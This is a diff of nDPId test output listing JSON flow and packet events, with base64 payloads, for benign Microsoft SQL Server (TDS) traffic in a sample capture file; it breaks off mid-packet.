-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} +00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7560000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\/wkE0AA0BCAAAAAAAAAEIAAAUwB0AHUAZABlAG4AYwBrAGkAZQAgAEsAbwBCAW8AIABQAHIAegBlAHcAbwBkAG4AaQBrAPMAdwAgAFQAdQByAHkAcwB0AHkAYwB6AG4AeQBjAGgAIAB3ACAARwBkAGEARAFzAGsAdQAKAHoAYQBwAHIAYQBzAHoAYQAgAG4AYQA6AAoAWABYAFgAVgAgAE4AbwBjAG4AZQAgAE0AYQByAHMAegBlACAAbgBhACAATwByAGkAZQBuAHQAYQBjAGoAGQEgACIARABhAHIAfAFsAHUAYgAiAAoAMAA0AC8AMAA1ACAAZwByAHUAZABuAGkAYQAgADIAMAAxADAACgAKAFcAcwB0ABkBcAAKAAoATgBvAGMAbgBlACAATQBhAHIAcwB6AGUAIABuAGEAIABPAHIAaQBlAG4AdABhAGMAagAZASAAIgBEAGEAcgB8AWwAdQBiACIAIABzAAUBIAB0AHUAcgB5AHMAdAB5AGMAegBuAAUBIABpAG0AcAByAGUAegAFASAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgACgASQBuAE8AKQAsACAAdwAgAGsAdADzAHIAZQBqACAAdQBjAHoAZQBzAHQAbgBpAGMAeQAgAG0AYQBqAAUBIAB6AGEAIAB6AGEAZABhAG4AaQBlACAAcABvAHQAdwBpAGUAcgBkAHoAaQAHASAAdwAgAG8AawByAGUAWwFsAG8AbgB5AG0AIABsAGkAbQBpAGMAaQBlACAAYwB6AGEAcwB1ACAAcwB3AG8AagAFASAAbwBiAGUAYwBuAG8AWwEHASAAcAByAHoAeQAgAHUAcwB0AGEAdwBpAG8AbgB5AGMAaAAgAHcAIAB0AGUAcgBlAG4AaQBlACAAcAB1AG4AawB0AGEAYwBoACAAawBvAG4AdAByAG8AbABuAHkAYwBoAC4AIABOAGEAIABkAGEAbgBlAGoAIAB0AHIAYQBzAGkAZQAgAHoAdwB5AGMAaQAZAXwBYQAgAHoAZQBzAHAA8wBCASwAIABrAHQA8wByAHkAIAB6AGEAIABwAG8AawBvAG4AYQBuAGkAZQAgAHQAcgBhAHMAeQAgAHUAegB5AHMAawBhAEIBIABuAGEAagBtAG4AaQBlAGoAcwB6AAUBIABsAGkAYwB6AGIAGQEgAHAAdQBuAGsAdADzAHcAIABrAGEAcgBuAHkAYwBoAC4AIABVAGMAegBlAHMAdABuAGkAawDzAHcAIABvAGIAbwB3AGkABQF6AHUAagBlACAAegBtAG8AZAB5AGYAaQBrAG8AdwBhAG4AeQAgAHIAZQBnAHUAbABhAG0AaQBuACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AGMAaAAgAGkAbQBwAHIAZQB6ACAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgAFAAVABUAEsALgAKAAoAVAB5AG0AIAByAGEAegBlAG0AIAB0AG8AdwBhAHIAegB5AHMAegB5AAcBIABuAGEAbQAgAGIAGQFkAHoAaQBlACAAYQBnAGUAbgB0ACAAMAAwADcALAAgAEoAYQBtAGUAcwAgAEIAbwBuAGQALgAgAFoAZABvAGIABQFkAHoBYwBpAGUAIABsAGkAYwBlAG4AYwBqABkBIABuAGEAIAB6AGEAYgBCAQUBZAB6AGUAbgBpAGUAIQAKAAoASgBhAGsAIABjAG8AIAByAG8AawB1ACAAbwBkAGIAGQFkAHoAaQBlACAAcwBpABkBIABrAG8AbgBrAHUAcgBzACAAbgBhACAAbgBhAGoAbAA="} +02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\/vKFNgAAZQBwAHMAegAFASAAbgBhAHoAdwAZASAAegBlAHMAcABvAEIBdQAgAG4AYQB3AGkABQF6AHUAagAFAWMABQEgAGQAbwAgAHQAZQBtAGEAdAB1ACAAcAByAHoAZQB3AG8AZABuAGkAZQBnAG8AIABpAG0AcAByAGUAegB5AC4ACgAKADEALgAgAE8AcgBnAGEAbgBpAHoAYQB0AG8AcgAgAGkAbQBwAHIAZQB6AHkACgAKAFMAdAB1AGQAZQBuAGMAawBpAGUAIABLAG8AQgFvACAAUAByAHoAZQB3AG8AZABuAGkAawDzAHcAIABUAHUAcgB5AHMAdAB5AGMAegBuAHkAYwBoACAAdwAgAEcAZABhAEQBcwBrAHUALAAgAGQAegBpAGEAQgFhAGoABQFjAGUAIABwAHIAegB5ACAATwBkAGQAegBpAGEAbABlACAAUwB0AHUAZABlAG4AYwBrAGkAbQAgAFAAVABUAEsALgAKAEEAZAByAGUAcwA6ACAAdQBsAC4AIABTAGkAZQBkAGwAaQBjAGsAYQAgADQALAAgADgAMAAtADIAMgAyACAARwBkAGEARAFzAGsALAAgAGUALQBtAGEAaQBsADoAIABzAGsAcAB0AEAAcwBrAHAAdAAuAGcAZABhAG4AcwBrAC4AcABsACwAIAB3AHcAdwAuAHMAawBwAHQALgBnAGQAYQBuAHMAawAuAHAAbAAKAAoAMgAuACAAVwBzAHAA8wBCAXAAcgBhAGMAYQAgAGkAIABzAHAAbwBuAHMAbwByAHoAeQAKAAoAIAAgACAAIAAqACAAZgBpAHIAbQBhACAAYwBhAHQAZQByAGkAbgBnAG8AdwBhACAAWQBlAGwAbABvAHcAIABDAGEAdABlAHIAaQBuAGcACgAgACAAIAAgACoAIABTAHQAbwB3AGEAcgB6AHkAcwB6AGUAbgBpAGUAIABOAGEAIABSAHoAZQBjAHoAIABSAGEAdABvAHcAbgBpAGMAdAB3AGEAIABBAGQAaQB1AHQAYQByAGUACgAgACAAIAAgACoAIABwAHIAbwBkAHUAYwBlAG4AdAAgAFsBcABpAHcAbwByAPMAdwAgAGkAIABvAGQAegBpAGUAfAF5ACAAcAB1AGMAaABvAHcAZQBqACAAUgBvAGIAZQByAHQAJwBzACAATwB1AHQAZABvAG8AcgAgAEUAcQB1AGkAcABtAGUAbgB0AAoAIAAgACAAIAAqACAAcwBrAGwAZQBwACAAegAgAG8AZAB6AGkAZQB8AQUBIABpACAAcwBwAHIAegAZAXQAZQBtACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AG0AIABUAHIAZQBrAAoAIAAgACAAIAAqACAAVwB5AGQAYQB3AG4AaQBjAHQAdwBvACAARQBrAG8ALQBLAGEAcABpAG8AIABQAGkAbwB0AHIAIABLAGEAcABjAHoAeQBEAXMAawBpAAoAIAAgACAAIAAqACAAUwBrAGwAZQBwACAAZwDzAHIAcwBrAGkAIABFAC0AcABhAG0AaQByAC4AcABsAAoAIAAgACAAIAAqACAAVABlAGEAdAByACAATQBpAGUAagBzAGsAaQAgAHcAIABHAGQAeQBuAGkAIABpAG0ALgAgAFcALgAgAEcAbwBtAGIAcgBvAHcAaQBjAHoAYQAKACAAIAAgACAAKgAgAFcAcwBwAGkAbgBhAGwAbgBpAGEAIABBAGwAZgBhACAAQwBlAG4AdAByAHUAbQAKACAAIAAgACAAKgAgAFAAaQBlAGsAYQByAG4AaQBhAC0AQwB1AGsAaQBlAHIAbgBpAGEAIABLAHIAYQBzAGsAbwB3AHMAawBpAAoACgAKADMALgAgAE4AbwB3AG8AWwFjAGkAIAB3ACAAdABlAGoAIABlAGQAeQBjAGoAaQAKAAoAIAA="} +02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAH